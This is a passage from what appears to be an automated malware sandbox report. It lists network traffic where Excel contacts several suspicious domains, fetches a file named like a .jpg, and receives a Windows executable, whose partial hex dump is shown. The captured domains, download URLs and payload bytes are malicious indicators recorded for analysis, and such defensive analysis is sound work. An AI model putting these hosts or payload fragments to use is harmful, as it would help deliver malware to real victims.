                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.505393028 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.505429983 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.505628109 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.506887913 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.506923914 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.507148027 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.508424044 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.508459091 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.508555889 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.509936094 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.509974003 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.510040998 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.514508963 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.514545918 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.514638901 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.515202045 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.515239000 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.515309095 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.516750097 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.516784906 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.516839981 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.518259048 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.518291950 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.518342972 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.519799948 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.519829988 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.519881964 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.521651983 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.521691084 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.521734953 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.522802114 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.522831917 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.522891045 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.524315119 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.524354935 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.524460077 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.525847912 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.525886059 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.525969028 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.563723087 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.563760996 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.563781023 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.563903093 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.563987970 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.564008951 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.564027071 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.564054966 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.564858913 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.564887047 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.564904928 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.564932108 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.564943075 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.565692902 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.565726042 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.565742016 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.565778017 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.566509962 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.566533089 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.566550970 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.566569090 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.566581964 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.567378044 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.567403078 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.567420006 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.567466021 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.568186998 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.568211079 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.568228006 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.568243027 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.568273067 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.569048882 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.569077969 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.569098949 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.569123983 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.569914103 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.569937944 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.569953918 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.569966078 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.569996119 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.570724964 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.570749044 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.570768118 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.570791006 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.571557045 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.571580887 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.571598053 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.571634054 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.571650982 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.572395086 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.572417021 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.572489023 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.572601080 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.573256016 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.573281050 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.573298931 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.573342085 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.574117899 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.574141026 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.574157953 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.574173927 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.574203968 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.574985981 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.575009108 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.575026035 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.575054884 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.575819016 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.575849056 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.575870037 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.575890064 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.575968027 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.576668978 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.576694012 CEST4434917013.224.92.73192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.576733112 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.635613918 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.842967987 CEST4917180192.168.2.22172.67.213.115
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.882703066 CEST8049171172.67.213.115192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.882828951 CEST4917180192.168.2.22172.67.213.115
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.886595011 CEST4917180192.168.2.22172.67.213.115
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.928324938 CEST8049171172.67.213.115192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:28.496232986 CEST8049171172.67.213.115192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:28.496263981 CEST8049171172.67.213.115192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:28.496330976 CEST4917180192.168.2.22172.67.213.115
                                                                                                                                                                                                                              Jul 6, 2021 17:43:31.121927023 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                                              Jul 6, 2021 17:43:31.122131109 CEST4917180192.168.2.22172.67.213.115
                                                                                                                                                                                                                              Jul 6, 2021 17:45:24.381650925 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                                                              Jul 6, 2021 17:45:24.381903887 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                                                              Jul 6, 2021 17:45:24.382141113 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                                                              Jul 6, 2021 17:45:24.422986984 CEST8049168172.67.194.117192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:45:24.423022985 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:45:24.423245907 CEST4916880192.168.2.22172.67.194.117
                                                                                                                                                                                                                              Jul 6, 2021 17:45:24.423348904 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                                                              Jul 6, 2021 17:45:24.423414946 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:45:24.423610926 CEST4916980192.168.2.22104.21.55.83

                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.458770037 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.520479918 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.662693024 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.728333950 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.915817976 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.980243921 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:26.143511057 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                                                                                              Jul 6, 2021 17:43:26.206418991 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:26.265383959 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                                                                                              Jul 6, 2021 17:43:26.329699039 CEST53495488.8.8.8192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.698635101 CEST5562753192.168.2.228.8.8.8
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.762717962 CEST53556278.8.8.8192.168.2.22
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.775300026 CEST5600953192.168.2.228.8.8.8
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.840548038 CEST53560098.8.8.8192.168.2.22

                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.458770037 CEST192.168.2.228.8.8.80xbf29Standard query (0)thousandsyears.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.662693024 CEST192.168.2.228.8.8.80xfbebStandard query (0)voopeople.funA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.915817976 CEST192.168.2.228.8.8.80xccaeStandard query (0)uppercilio.funA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:26.143511057 CEST192.168.2.228.8.8.80xa3a3Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:26.265383959 CEST192.168.2.228.8.8.80x4023Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.698635101 CEST192.168.2.228.8.8.80xcc9cStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.775300026 CEST192.168.2.228.8.8.80xb2ddStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)

                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.520479918 CEST8.8.8.8192.168.2.220xbf29No error (0)thousandsyears.download172.67.198.51A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.520479918 CEST8.8.8.8192.168.2.220xbf29No error (0)thousandsyears.download104.21.52.111A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.728333950 CEST8.8.8.8192.168.2.220xfbebNo error (0)voopeople.fun172.67.194.117A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.728333950 CEST8.8.8.8192.168.2.220xfbebNo error (0)voopeople.fun104.21.12.122A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.980243921 CEST8.8.8.8192.168.2.220xccaeNo error (0)uppercilio.fun104.21.55.83A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.980243921 CEST8.8.8.8192.168.2.220xccaeNo error (0)uppercilio.fun172.67.146.88A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:26.206418991 CEST8.8.8.8192.168.2.220xa3a3No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:26.206418991 CEST8.8.8.8192.168.2.220xa3a3No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:26.206418991 CEST8.8.8.8192.168.2.220xa3a3No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:26.329699039 CEST8.8.8.8192.168.2.220x4023No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:26.329699039 CEST8.8.8.8192.168.2.220x4023No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:26.329699039 CEST8.8.8.8192.168.2.220x4023No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.762717962 CEST8.8.8.8192.168.2.220xcc9cNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.762717962 CEST8.8.8.8192.168.2.220xcc9cNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.840548038 CEST8.8.8.8192.168.2.220xb2ddNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                                              Jul 6, 2021 17:43:27.840548038 CEST8.8.8.8192.168.2.220xb2ddNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)

                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                              • thousandsyears.download
                                                                                                                                                                                                                              • voopeople.fun
                                                                                                                                                                                                                              • uppercilio.fun
                                                                                                                                                                                                                              • astrocycle.download

                                                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              0192.168.2.2249167172.67.198.5180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.577158928 CEST0OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                              Host: thousandsyears.download
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.636230946 CEST1INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Tue, 06 Jul 2021 15:43:24 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 6413
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=vm7YcVJThRDoLU1IaJjXnbLneYPMgjWjTwTItXvFDJo5zRWPs1nVWI82HUwlEPm440JvAYz3Y8gmbPVtbvxbuvUMJhOAcKYbShxE3KtdcOXKy99TXetWq2VarWSKMNT7OnVXwCc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 66a9f2d2c8e94e3d-FRA
                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                              Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                                                                                                                                                              Data Ascii: 14
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.636265993 CEST1INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              1192.168.2.2249168172.67.194.11780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.769382000 CEST2OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                              Host: voopeople.fun
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.843807936 CEST3INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Tue, 06 Jul 2021 15:43:24 GMT
                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                              Content-Length: 57856
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 6412
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=VYaHfTaTiGvO95MRIBYQi4x1j395FG8acrj4SxWRfuhJlpNjHQS1wbSNoWu%2B%2FJ4VVWSMsUkTlyAD%2FsD32Y%2BUigC9j4pL79FSATfy%2BIIFVKs9%2BlkJ1QKyieO%2B%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 66a9f2d40e9f2c22-FRA
                                                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00
                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.843856096 CEST5INData Raw: 00 00 01 00 00 02 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii: @@
                                                                                                                                                                                                                              Jul 6, 2021 17:43:24.843868017 CEST6INData Raw: f6 89 05 6b dc 00 00 c7 84 24 a4 00 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89
